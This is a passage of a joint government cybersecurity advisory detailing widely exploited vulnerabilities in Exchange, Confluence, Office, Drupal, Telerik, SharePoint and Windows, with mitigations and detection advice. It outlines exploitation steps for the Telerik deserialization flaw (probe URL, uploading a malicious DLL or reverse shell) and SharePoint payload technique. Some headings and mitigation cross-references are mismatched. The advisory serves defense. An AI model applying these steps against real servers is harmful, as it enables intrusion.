[https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF](<https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF%20>) and signatures at <https://github.com/nsacyber/Mitigating-Web-Shells>. \n \n_**Vulnerable Technologies and Versions**_\n\nMicrosoft Exchange Server 2019 Cumulative Update 3 and 4, 2016 Cumulative Update 14 and 15, 2013 Cumulative Update 23, and 2010 Service Pack 3 Update Rollup 30 are vulnerable. \n \n_**References**_\n\n * [Microsoft Security Update Guide: CVE-2020-0688](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0688>)\n * [NIST NVD Vulnerability Detail: CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>)\n * [Microsoft Security Update: Description of the security update for Microsoft Exchange Server 2019 and 2016: February 11, 2020](<https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-and-2016-february-11-2020-94ac1ebb-fb8a-b536-9240-a1cab0fd1c9f>)\n * [CISA-FBI Joint Cybersecurity Advisory: Russian State-Sponsored Advanced Persistent Threat Actor Compromises U.S. Government Targets](<https://us-cert.cisa.gov/ncas/alerts/aa20-296a>)\n * [ACSC Alert: Active Exploitation of Vulnerability in Microsoft Internet Information Services](<https://www.cyber.gov.au/acsc/view-all-content/alerts/active-exploitation-vulnerability-microsoft-internet-information-services>)\n * [NSA-CISA-FBI-NCSC Cybersecurity Advisory: Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments](<https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/0/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF>) \n \n_Table 8: CVE-2019-3396 Vulnerability Details_\n\nMicrosoft Office Memory Corruption (CVE 2017-11882) \n--- \n \n_**Vulnerability Description**_\n\nAtlassian Confluence Server and Data Center Widget Connector is vulnerable to a server-side template injection attack.\n\n| \n\n_**CVSS**_\n\nCritical \n \n_**Vulnerability Discussion, IOCs, and Malware Campaigns**_\n\nConfluence Server and Data Center versions released before June 18, 2018, are vulnerable to this issue. A remote attacker is able to exploit a server-side request forgery (SSRF) vulnerability in the WebDAV plugin to send arbitrary HTTP and WebDAV requests from a Confluence Server or Data Center instance. A successful attack is able to exploit this issue to achieve server-side template injection, path traversal, and RCE on vulnerable systems.\n\n_Multiple malware campaigns have taken advantage of this vulnerability; the most notable being GandCrab ransomware._\n\n| \n\n_**Fix**_\n\n[Patch Available](<Patch%20Available>) \n \n_**Recommended Mitigations**_\n\n * Download and install a fixed software version of the software from a vendor-approved resource. \n \n_**Detection Methods**_\n\n * Manually check the software version to see if it is susceptible to this vulnerability.\n\n * CVE-2019-3396 is commonly exploited to install web shell malware. NSA provides guidance on detecting and preventing web shell malware at <https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF> and signatures at [https://github.com/nsacyber/Mitigating-Web-Shells.](<https://github.com/nsacyber/Mitigating-Web-Shells>) \n \n_**Vulnerable Technologies and Versions**_\n\nAll versions of Confluence Server and Confluence Data Center before version 6.6.12, from version 6.7.0 before 6.12.3 (the fixed version for 6.12.x), from version 6.13.0 before 6.13.3 (the fixed version for 6.13.x), and from version 6.14.0 before 6.14.2 (the fixed version for 6.14.x) are vulnerable. \n \n_**References**_\n\n * [NIST NVD Vulnerability Detail: CVE-2019-3396](<https://nvd.nist.gov/vuln/detail/CVE-2019-3396>)\n * [MITRE CVE Record: CVE-2019-3396](<https://vulners.com/cve/CVE-2019-3396>)\n * [Confluence Security Advisory: Confluence Data Center and Server 7.12](<https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html>)\n * [Confluence Server and Data Center CONFSERVER-57974: Remote Code Execution via Widget Connector Macro - CVE-2019-3396](<https://jira.atlassian.com/browse/CONFSERVER-57974>)\n * [TrendMicro Research Article: CVE-2019-3396: Exploiting the Confluence Vulnerability](<https://www.trendmicro.com/en_us/research/19/e/cve-2019-3396-redux-confluence-vulnerability-exploited-to-deliver-cryptocurrency-miner-with-rootkit.html>) \n \n_Table 9: CVE 2017-11882 Vulnerability Details_\n\nMicrosoft Office Memory Corruption (CVE 2017-11882) \n--- \n \n_**Vulnerability Description**_\n\nMicrosoft Office is prone to a memory corruption vulnerability allowing an attacker to run arbitrary code, in the context of the current user, by failing to properly handle objects in memory. It is also known as the \"Microsoft Office Memory Corruption Vulnerability.\" \n\nCyber actors continued to exploit this four-year-old vulnerability in Microsoft Office that the U.S. Government publicly assessed last year was the most frequently targeted. Cyber actors most likely continue to exploit this vulnerability because Microsoft Office use is ubiquitous worldwide, the vulnerability is ideal for phasing campaigns, and it enables RCE on vulnerable systems.\n\n| \n\n_**CVSS 3.0**_\n\nHigh \n \n_**Vulnerability Discussion, IOCs, and Malware Campaigns**_\n\nMicrosoft Equation Editor, a component of Microsoft Office, contains a stack buffer overflow vulnerability that enables RCE on a vulnerable system. The component was compiled on November 9, 2000. Without any further recompilation, it was used in all currently supported versions of Microsoft Office. Microsoft Equation Editor is an out-of-process COM server that is hosted by `eqnedt32.exe`, meaning it runs as its own process and can accept commands from other processes.\n\nData execution prevention (DEP) and address space layout randomization (ASLR) should protect against such attacks. However, because of the manner in which `eqnedt32.exe` was linked, it will not use these features, subsequently allowing code execution. Being an out-of-process COM server, protections specific to Microsoft Office such as EMET and Windows Defender Exploit Guard are not applicable to `eqnedt32.exe`, unless applied system-wide. This provides the attacker with an avenue to lure targets into opening specially crafted documents, resulting in the ability to execute an embedded attacker commands.\n\n_Multiple cyber espionage campaigns have taken advantage of this vulnerability. CISA has noted CVE-2017-11882 being exploited to [deliver LokiBot malware](<https://us-cert.cisa.gov/ncas/alerts/aa20-266a>)._\n\n| \n\n**_Fix_**\n\n[Patch Available](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-11882>) \n \n_**Recommended Mitigations**_\n\n * To remediate this issue, administrators should deploy Microsoft\u2019s patch for this vulnerability: <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>.\n * Those who cannot deploy the patch should consider disabling the Equation Editor as discussed in [Microsoft Knowledge Base Article 4055535](<https://support.microsoft.com/en-us/topic/how-to-disable-equation-editor-3-0-7e000f58-cbf4-e805-b4b1-fde0243c9a92>). \n \n_**Detection Methods**_\n\n * Microsoft Defender Antivirus, Windows Defender, Microsoft Security Essentials, and the Microsoft Safety Scanner will all detect and patch this vulnerability. \n \n_**Vulnerable Technologies and Versions**_\n\n * Microsoft Office 2007 Service Pack 3, Microsoft Office 2010 Service Pack 2, Microsoft Office 2013 Service Pack 1, and Microsoft Office 2016 are vulnerable. \n \n_**References**_\n\n * [NIST NVD Vulnerability Detail: CVE-2017-11882](<https://nvd.nist.gov/vuln/detail/CVE-2017-11882>)\n * [CISA Malware Analysis Report: MAR-10211350-1.v2](<https://us-cert.cisa.gov/ncas/analysis-reports/ar20-133e>)\n * [Palo Alto Networks Analysis: Analysis of CVE-2017-11882 Exploit in the Wild](<https://unit42.paloaltonetworks.com/unit42-analysis-of-cve-2017-11882-exploit-in-the-wild/>)\n * [CERT Coordination Center Vulnerability Note: Microsoft Office Equation Editor stack buffer overflow](<https://www.kb.cert.org/vuls/id/421280>) \n \n_Table 10: CVE 2019-11580 Vulnerability Details_\n\nAtlassian Crowd and Crowd Data Center Remote Code Execution (CVE 2019-11580) \n--- \n \n_**Vulnerability Description**_\n\nAtlassian Crowd and Crowd Data Center had the `pdkinstall` development plugin incorrectly enabled in release builds.\n\n| \n\n_**CVSS 3.0**_\n\nCritical \n \n_**Vulnerability Discussion, IOCs, and Malware Campaigns**_\n\nAttackers who can send unauthenticated or authenticated requests to a Crowd or Crowd Data Center instance can exploit this vulnerability to install arbitrary plugins, which permits RCE on systems running a vulnerable version of Crowd or Crowd Data Center.\n\n| \n\n**_Fix_**\n\n[Patch Available](<https://confluence.atlassian.com/crowd/crowd-security-advisory-2019-05-22-970260700.html>) \n \n_**Recommended Mitigations**_\n\n * Atlassian recommends customers running a version of Crowd below version 3.3.0 to upgrade to version 3.2.8. For customers running a version above or equal to 3.3.0, Atlassian recommends upgrading to the latest version.\n * Released Crowd and Crowd Data Center version 3.4.4 contains a fix for this issue and is available at <https://www.atlassian.com/software/crowd/download>.\n * Released Crowd and Crowd Data Center versions 3.0.5, 3.1.6, 3.2.8, and 3.3.5 contain a fix for this issue and are available at <https://www.atlassian.com/software/crowd/download-archive>. \n \n_**Detection Methods**_\n\n * Manually check your software version to see if it is susceptible to this vulnerability.\n * CVE-2019-11580 is commonly exploited to install web shell malware. NSA provides guidance on detecting and preventing web shell malware at [https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PD](<https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF>)F and signatures at <https://github.com/nsacyber/Mitigating-Web-Shells> \n \n_**Vulnerable Technologies and Versions**_\n\nAll versions of Crowd from version 2.1.0 before 3.0.5 (the fixed version for 3.0.x), from version 3.1.0 before 3.1.6 (the fixed version for 3.1.x), from version 3.2.0 before 3.2.8 (the fixed version for 3.2.x), from version 3.3.0 before 3.3.5 (the fixed version for 3.3.x), and from version 3.4.0 before 3.4.4 (the fixed version for 3.4.x) are affected by this vulnerability. \n \n**_References_**\n\n * [NIST NVD Vulnerability Detail: CVE-2019-11580](<https://nvd.nist.gov/vuln/detail/CVE-2019-11580>)\n * [Crowd CWD-5388: Crowd \u2013 pdkinstall Development Plugin Incorrectly Enabled \u2013 CVE-2019-11580](<https://jira.atlassian.com/browse/CWD-5388>)\n * [Crowd Security Advisory: Crowd Data Center and Server 4.3](<https://confluence.atlassian.com/crowd/crowd-security-advisory-2019-05-22-970260700.html>) \n \n_Table 11: CVE 2018-7600 Vulnerability Details_\n\nDrupal Core Multiple Remote Code Execution (CVE 2018-7600) \n--- \n \n_**Vulnerability Description**_\n\nDrupal versions before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allow remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.\n\n| \n\n_**CVSS 3.0**_\n\nCritical \n \n_**Vulnerability Discussion, IOCs, and Malware Campaigns**_\n\nAn RCE vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised. Failed exploit attempts may result in a denial-of-service condition. A remote user can send specially crafted data to trigger a flaw in the processing of renderable arrays in the Form Application Programming Interface, or API, and cause the target system to render the user-supplied data and execute arbitrary code on the target system.\n\n_Malware campaigns include the Muhstik botnet and XMRig Monero Cryptocurrency mining._\n\n| \n\n**_Fix_**\n\n[Patch Available](<https://www.drupal.org/sa-core-2018-002>) \n \n_**Recommended Mitigations**_\n\n * Upgrade to the most recent version of Drupal 7 or 8 core. If running 7.x, upgrade to Drupal 7.58. If running 8.5.x, upgrade to Drupal 8.5.1. \n \n_**Detection Methods**_\n\n * Dan Sharvit developed a tool to check for the CVE-2018-7600 vulnerability on several URLs: [https://github.com/sl4cky/CVE-2018-7600-Masschecker/blob/master/Drupalgeddon-mass.py.](<https://github.com/sl4cky/CVE-2018-7600-Masschecker/blob/master/Drupalgeddon-mass.py>) \n \n_**Vulnerable Technologies and Versions**_\n\n * Drupal versions before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 are affected. \n \n_**References**_\n\n * [Drupal Security Advisory: Drupal Core - Highly Critical - Remote Code Execution - SA-CORE-2018-002](<https://www.drupal.org/sa-core-2018-002>)\n * [NIST NVD Vulnerability Detail: CVE-2018-7600](<https://nvd.nist.gov/vuln/detail/CVE-2018-7600>)\n * [Drupal Groups: FAQ about SA-CORE-2018-002](<https://groups.drupal.org/security/faq-2018-002>) \n \n_Table 12: CVE 2019-18935 Vulnerability Details_\n\nTelerik UI for ASP.NET AJAX Insecure Deserialization (CVE 2019-18935) \n--- \n \n_**Vulnerability Description**_\n\nTelerik User Interface (UI) for ASP.NET does not properly filter serialized input for malicious content. Versions prior to R1 2020 (2020.1.114) are susceptible to remote code execution attacks on affected web servers due to a deserialization vulnerability.\n\n| \n\n**_CVS 3.0_**\n\nCritical \n \n_**Vulnerability Discussion, IOCs, and Malware Campaigns**_\n\nThe Telerik UI does not properly sanitize serialized data inputs from the user. This vulnerability leads to the application being vulnerable to RCE attacks that may lead to a full system compromise. A vulnerable `HTTP POST` parameter `rauPostData` makes use of a vulnerable function/object `AsyncUploadHandler`. The object/function uses the `JavaScriptSerializer.Deserialize()` method, which not not properly sanitize the serialized data during the deserialization process. This issue is attacked by:\n\n 1. Determining the vulnerable function is available/registered: ` http://<HOST>/Telerik.Web.UI.WebResource.axd?type=rau`,\n 2. Determining if the version running is vulnerable by querying the UI, and\n 3. Creating an object (e.g., malicious mixed-mode DLL with native OS commands or Reverse Shell) and uploading the object via rauPostData parameter along with the proper encryption key.\n\n_There were two malware campaigns associated with this vulnerability:_\n\n * _Netwalker Ransomware and_\n * _Blue Mockbird Monero Cryptocurrency-mining._\n| \n\n_**Fix**_\n\n[Patch Available](<https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization>) \n \n_**Recommended Mitigations**_\n\n * Update to the most recent version of Telerik UI for ASP.NET AJAX (at least 2020.1.114 or later). \n \n_**Detection Methods**_\n\n * ACSC has an example PowerShell script that can be used to identify vulnerable Telerik UI DLLs on Windows web server hosts.\n * Vulnerable hosts should be reviewed for evidence of exploitation. Indicators of exploitation can be found in IIS HTTP request logs and within the Application Windows event log. Details of the above PowerShell script and exploitation detection recommendations are available in [ACSC Advisory 2020-004](<https://www.cyber.gov.au/acsc/view-all-content/advisories/advisory-2020-004-remote-code-execution-vulnerability-being-actively-exploited-vulnerable-versions-telerik-ui-sophisticated-actors>).\n * Exploitation of this and previous Telerik UI vulnerabilities commonly resulted in the installation of web shell malware. NSA provides guidance on [detecting and preventing web shell malware](<https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF>). \n \n**_Vulnerable Technologies and Versions_**\n\nTelerik UI for ASP.NET AJAX versions prior to R1 2020 (2020.1.114) are affected. \n \n**_References_**\n\n * [Telerik UI for ASP.NET AJAX security advisory \u2013 Allows JavaScriptSerializer Deserialization](<https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization>)\n * [NIST NVD Vulnerability Detail: CVE-2019-18935](<https://nvd.nist.gov/vuln/detail/CVE-2019-18935>)\n * [ACSC Advisory 2020-004: Remote Code Execution Vulnerability Being Actively Exploited in Vulnerable Versions of Telerik UI by Sophisticated Actors](<https://www.cyber.gov.au/acsc/view-all-content/advisories/advisory-2020-004-remote-code-execution-vulnerability-being-actively-exploited-vulnerable-versions-telerik-ui-sophisticated-actors>)\n * [Bishop Fox \u2013 CVE-2019-18935: Remote Code Execution via Insecure Deserialization in Telerik UI](<https://labs.bishopfox.com/tech-blog/cve-2019-18935-remote-code-execution-in-telerik-ui>)\n * [FBI FLASH: Indicators Associated with Netwalker Ransomware](<https://www.ic3.gov/Media/News/2020/200929-2.pdf>) \n \n_Table 13: CVE-2019-0604 Vulnerability Details_\n\nMicrosoft SharePoint Remote Code Execution (CVE-2019-0604) \n--- \n \n_**Vulnerability Description**_\n\nA vulnerability in an XML deserialization component within Microsoft SharePoint allowed remote attackers to execute arbitrary code on vulnerable Microsoft SharePoint servers.\n\n| \n\n**_CVSS 3.0_**\n\nCritical \n \n_**Vulnerability Discussion, IOCs, and Malware Campaigns**_\n\nThis vulnerability was typically exploited to install webshell malware to vulnerable hosts. A webshell could be placed in any location served by the associated Internet Information Services (IIS) web server and did not require authentication. These web shells would commonly be installed in the Layouts folder within the Microsoft SharePoint installation directory, for example:\n\n`C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\<version_number>\\Template\\Layouts`\n\nThe `xmlSerializer.Deserialize()` method does not adequately sanitize user input that is received from the PickerEnitity/ValidateEnity (`picker.aspx`) functions in the serialized XML payloads. Once the serialized XML payload is deserialized, the XML code is evaulated for relevant XML commands and stings. A user can attack .Net based XML parsers with XMLNS payloads using the <`system:string`> tag and embedding malicious operating system commands. \n\n_The exploit was used in malware phishing and the WickrMe/Hello Ransomware campaigns._\n\n| \n\n_**Fix**_\n\n[Patch Available](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2019-0604>) \n \n_**Recommended Mitigations**_\n\n * Upgrade on-premise installations of Microsoft Sharepoint to the latest available version (Microsoft SharePoint 2019) and patch level.\n * On-premise Microsoft SharePoint installations with a requirement to be accessed by internet-based remote staff should be moved behind an appropriate authentication mechanism such as a VPN, if possible. \n \n_**Detection Methods**_\n\n * The patch level of on-premise Microsoft SharePoint installations should be reviewed for the presence of relevant security updates as outlined in the Microsoft SharePoint security advisory.\n * Vulnerable SharePoint servers should be reviewed for evidence of attempted exploitation. [ACSC Advisory 2019-125](<https://www.cyber.gov.au/acsc/view-all-content/advisories/acsc-advisory-2019-125-targeting-microsoft-sharepoint-cve-2019-0604>) contains advice on reviewing IIS HTTP request logs for evidence of potential exploitation.\n * NSA provides guidance on [detecting and preventing web shell malware](<https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF>). \n \n_**Vulnerable Technologies and Versions**_\n\nAt the time of the vulnerability release, the following Microsoft SharePoint versions were affected: Microsoft Sharepoint 2019, Microsoft SharePoint 2016, Microsoft SharePoint 2013 SP1, and Microsoft SharePoint 2010 SP2. \n \n_**References**_\n\n * [Microsoft \u2013 SharePoint Remote Code Execution Vulnerability Security Advisory](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2019-0604>)\n * [NIST NVD Vulnerability Detail: CVE-2019-0604](<https://nvd.nist.gov/vuln/detail/cve-2019-0604>)\n * [ACSC Advisory 2019-125: Targeting of Microsoft SharePoint CVE-2019-0604](<https://www.cyber.gov.au/acsc/view-all-content/advisories/acsc-advisory-2019-125-targeting-microsoft-sharepoint-cve-2019-0604>)\n * [NSCS Alert: Microsoft SharePoint Remote Code Vulnerability](<https://www.ncsc.gov.uk/news/alert-microsoft-sharepoint-remote-code-vulnerability>) \n \n_Table 14: CVE-2020-0787 Vulnerability Details_\n\nWindows Background Intelligent Transfer Service Elevation of Privilege (CVE-2020-0787) \n--- \n \n_**Vulnerability Description**_\n\nThe Windows Background Intelligent Transfer Service (BITS) is vulnerable to a privilege elevation vulnerability if it improperly handles symbolic links. An actor can exploit this vulnerability to execute arbitrary code with system-level privileges.\n\n| \n\n_**CVSS 3.0**_\n\nHigh \n \n_**Vulnerability Discussion, IOCs, and Malware Campaigns**_\n\nTo exploit this vulnerability, an actor would first need to have the ability to execute arbitrary code on a vulnerable Windows host.\n\nActors exploiting this vulnerability commonly used the proof of concept code released by the security researcher who discovered the vulnerability. If an actor left the proof of concept exploit\u2019s working directories unchanged, then the presence of the following folders could be used as an indicator of exploitation:\n\n`C:\\Users\\<username>\\AppData\\Local\\Temp\\workspace \nC:\\Users\\<username>\\AppData\\Local\\Temp\\workspace\\mountpoint \nC:\\Users\\<username>\\AppData\\Local\\Temp\\workspace\\bait`\n\n_The exploit was used in Maze and Egregor ransomware campaigns._\n\n| \n\n_**Fix**_\n\n[Patch Available](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0787>) \n \n_**Recommended Mitigations**_\n\n * Apply the security updates as recommended in the Microsoft Netlogon security advisory. \n \n_**Detection Methods**_\n\n * The patch level of all Microsoft Windows installations should be reviewed for the presence of relevant security updates as outlined in the Microsoft BITS security advisory. \n \n_**Vulnerable Technologies and Versions**_\n\nWindows 7 for 32-bit and x64-based Systems Service Pack 1, 8.1 for 32-bit and x64-based systems, RT 8.1, 10 for 32-bit and x64-based Systems, 10 1607 for 32-bit and x64-based Systems, 10 1709 for 32-bit and x64-based and ARM64-based Systems, 10 1803 for 32-bit and ARM64-based and x64-based Systems, 10 1809 for 32-bit and ARM64-based and x64-based Systems, 10 1903 for 32-bit and ARM64-based and x64-based Systems, 10 1909 for 32-bit, and ARM64-based and x64-based Systems are vulnerable.\n\nWindows Server 2008 R2 for x64-based Systems Service Pack 1, 2008 R2 for x64-based Systems Service Pack 1 (Server Core Installation), 2008 for 32-bit Systems Service Pack 2, 2008 for 32-bit Systems Service Pack 2 (Server Core Installation), 2012, 2012 (Server Core Installation), 2012 R2, 2012 R2 (Server Core Installation), 2016, 2016 (Server Core Installation), 2019, 2019 (Server Core Installation), 1803 (Server Core Installation), 1903 (Server Core Installation), and 1909 (Server Core Installation) are also vulnerable. \n \n_**References**_\n\n * [Microsoft \u2013 Windows Background Intelligent Transfer Service Elevation of Privilege Security Advisory](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0787>)\n * [NIST NVD Vulnerability Detail: CVE-2020-0787](<https://nvd.nist.gov/vuln/detail/CVE-2020-0787>)\n * [Security Researcher \u2013 Proof of Concept Exploit Code](<https://itm4n.github.io/cve-2020-0787-windows-bits-eop/>) \n \n_Table 15: CVE-2020-1472 Vulnerability Details_\n\nMicrosoft Netlogon Elevation of Privilege (CVE-2020-1472) \n--- \n \n_**Vulnerability Description**_\n\nThe Microsoft Windows Netlogon Remote Protocol (MS-NRPC) reuses a known, static, zero-value initialization vector (VI) in AES-CFB8 mode, which could allow an unauthenticated attacker to impersonate a domain-joined computer including a domain controller, and potentially obtain domain administrator privileges.\n\n| \n\n_**CVSS 3.0**_\n\nCritical \n \n_**Vulnerability Discussion, IOCs, and Malware Campaigns**_\n\nTo exploit this vulnerability, an actor would first need to have an existing presence on an internal network with network connectivity to a vulnerable Domain Controller, assuming that Domain Controllers are not exposed to the internet.\n\nThe immediate effect of successful exploitation results in the ability to authentication to the vulnerable Domain Controller with Domain Administrator level credentials. In compromises exploiting this vulnerability, exploitation was typically followed immediately by dumping all hashes for Domain accounts.\n\nThreat actors were seen combining the MobileIron CVE-2020-15505 vulnerability for initial access, then using the Netlogon vulnerability to facilitate lateral movement and further compromise of target networks.\n\n_A nation-state APT group has been observed exploiting this vulnerability_.[[18](<https://www.cyber.nj.gov/alerts-advisories/apt10-adds-zerologon-exploitation-to-ttps>)]\n\n| \n\n_**Fix**_\n\n[Patch Available](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-1472>) \n \n_**Recommended Mitigations**_\n\n * Apply the security updates as recommended in the Microsoft Netlogon security advisory. \n \n_**Detection Methods**_\n\n * The patch level of Domain Controllers should be reviewed for the presence of relevant security updates as outlined in the Microsoft Netlogon security advisory.\n * Reviewing and monitoring Windows Event Logs can identify potential exploitation attempts. However, further investigation would still be required to eliminate legitimate activity. Further information on these event logs is available in the [ACSC 2020-016 Advisory](<https://www.cyber.gov.au/acsc/view-all-content/advisories/advisory-2020-016-zerologon-netlogon-elevation-privilege-vulnerability-cve-2020-1472>). \n \n_**Vulnerable Technologies and Versions**_\n\nAt the time of the vulnerability release, the following Microsoft Windows Server versions were vulnerable: all versions of Windows Server 2019; all versions of Windows Server 2016; Windows Server 2012 R2; Windows Server 2012; Windows Server 2008 R2 SP1; and Windows Server versions 1909/1903/1809. \n \n_**References**_\n\n * [Microsoft \u2013 Netlogon Elevation of Privilege Vulnerability](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1472>)\n * [NIST NVD Vulnerability Detail: CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/cve-2020-1472>)\n * [ACSC 2020-016 Netlogon Advisory](<https://www.cyber.gov.au/acsc/view-all-content/advisories/advisory-2020-016-zerologon-netlogon-elevation-privilege-vulnerability-cve-2020-1472>)\n * [CISA-FBI Joint Cybersecurity Advisory: APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations](<https://us-cert.cisa.gov/ncas/alerts/aa20-283a>)\n * [CISA-FBI Joint Cybersecurity Advisory: Russian State-Sponsored Advanced Persistent Threat Actor Compromises U.S. Government Targets](<https://us-cert.cisa.gov/ncas/alerts/aa20-296a>)\n * [ACSC Advisory 2020-016: \"Zerologon\" \u2013 Netlogon Elevation of Privilege Vulnerability (CVE-2020-1472)](<https://www.cyber.gov.au/acsc/view-all-content/advisories/advisory-2020-016-zerologon-netlogon-elevation-privilege-vulnerability-cve-2020-1472>)\n * [NCSC Alert: UK Organisations Should Patch Netlogon Vulnerability (Zerologon)](<https://www.ncsc.gov.uk/news/alert-organisations-should-patch-netlogon-vulnerability>) \n \nFor additional general best practices for mitigating cyber threats, see the joint advisory from Australia, Canada, New Zealand, the United Kingdom, and the United States on [Technical Approaches to Uncovering and Remediating Malicious Activity](<https://us-cert.cisa.gov/ncas/alerts/aa20-245a>) and ACSC\u2019s [Essential Eight](<https://www.cyber.gov.au/acsc/view-all-content/essential-eight>) mitigation strategies.\n\n### Additional Resources\n\n#### Free Cybersecurity Services\n\nCISA offers several free cyber hygiene vulnerability scanning and web application services to help U.S. federal agencies, state and local governments, critical infrastructure, and private organizations reduce their exposure to threats by taking a proactive approach to mitigating attack vectors. For more information about [CISA\u2019s free services](<https://www.cisa.gov/cyber-hygiene-services>), or to sign up, email [vulnerability_info@cisa.dhs.gov](<mailto:vulnerability_info@cisa.dhs.gov>).\n\n#### Cyber Essentials\n\n[CISA\u2019s Cyber Essentials](<https://www.cisa.gov/cyber-essentials>) is a guide for leaders of small businesses as well as leaders of small and local government agencies to develop an actionable understanding of where to start implementing organizational cybersecurity practices.\n\n#### Cyber.gov.au \n\n[ACSC\u2019s website](<https://www.cyber.gov.au/>) provides advice and information about how to protect individuals and families, small- and medium-sized businesses, large organizations and infrastructure, and government organizations from cyber threats.\n\n#### ACSC Partnership Program\n\nThe ACSC Partnership Program enables Australian organizations and individuals to engage with ACSC and fellow partners, drawing on collective understanding, experience, skills, and capability to lift cyber resilience across the Australian economy.\n\nAustralian organizations, including government and those in the private sector as well individuals, are welcome to sign up at [Become an ACSC partner](<https://www.cyber.gov.au/partner-hub/become-a-partner>) to join.\n\n#### NCSC 10 Steps\n\nThe NCSC offers [10 Steps to Cyber Security](<https://urldefense.us/v3/__https:/www.ncsc.gov.uk/collection/10-steps__;!!BClRuOV5cvtbuNI!T8Z-cMwGes9PcbBL1utGkQdFFUBjxNk7elZg1ioCK-eU1tUQokVWKONDFlwSGb1kHLNs74-CWWI8Rbcz%24>), providing detailed guidance on how medium and large organizations can manage their security.\n\nOn vulnerabilities specifically, the NCSC has [guidance to organizations on establishing an effective vulnerability management process](<https://urldefense.us/v3/__https:/www.ncsc.gov.uk/guidance/vulnerability-management__;!!BClRuOV5cvtbuNI!T8Z-cMwGes9PcbBL1utGkQdFFUBjxNk7elZg1ioCK-eU1tUQokVWKONDFlwSGb1kHLNs74-CWfrZnnW4%24>), focusing on the management of widely available software and hardware.\n\n### Contact Information\n\nTo report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at[ www.fbi.gov/contact-us/field](<https://www.fbi.gov/contact-us/field-offices>), or the FBI\u2019s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at [CyWatch@fbi.gov](<mailto:CyWatch@fbi.gov>). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. If you have any further questions related to this Joint Cybersecurity Advisory, or to request incident response resources or technical assistance related to these threats, contact CISA at [Central@cisa.gov](<mailto:Central@cisa.gov>).\n\n### References\n\n[[1] NSA-CISA-FBI Cybersecurity Advisory: Russian SVR Targets U.S. and Allied Networks](<https://media.defense.gov/2021/Apr/15/2002621240/-1/-1/0/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF>)\n\n[[2] CISA-FBI-NSA-NCSC Advisory: Further TTPs Associated with SVR Cyber Actors](<https://us-cert.cisa.gov/ncas/current-activity/2021/05/07/joint-ncsc-cisa-fbi-nsa-cybersecurity-advisory-russian-svr>)\n\n[[3] NSA Cybersecurity Advisory: Chinese State-Sponsored Actors Exploit Publicly Known Vulnerabilities](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>)\n\n[[4] ACSC Advisory 2020-001-4: Remediation for Critical Vulnerability in Citrix Application Delivery Controller and Citrix Gateway](<https://www.cyber.gov.au/acsc/view-all-content/advisories/2020-001-4-remediation-critical-vulnerability-citrix-application-delivery-controller-and-citrix-gateway>)\n\n[[5] NCSC Alert: Actors Exploiting Citrix Products Vulnerability](<https://www.ncsc.gov.uk/news/citrix-alert>)\n\n[[6] Russian State-Sponsored Advanced Persistent Threat Actor Compromises U.S. Government Targets](<https://us-cert.cisa.gov/ncas/alerts/aa20-296a>)\n\n[[7] CISA-FBI Joint Cybersecurity Advisory: Top 10 Routinely Exploited Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>)\n\n[[8] ACSC Alert: APT Exploitation of Fortinet Vulnerabilities](<https://www.cyber.gov.au/acsc/view-all-content/alerts/apt-exploitation-fortinet-vulnerabilities>)\n\n[[9] NCSC Alert: Alert: Critical Risk to Unpatched Fortinet VPN Devices](<https://www.ncsc.gov.uk/news/critical-risk-unpatched-fortinet-vpn-devices>)\n\n[[10] NSA Cybersecurity Advisory: Mitigating Recent VPN 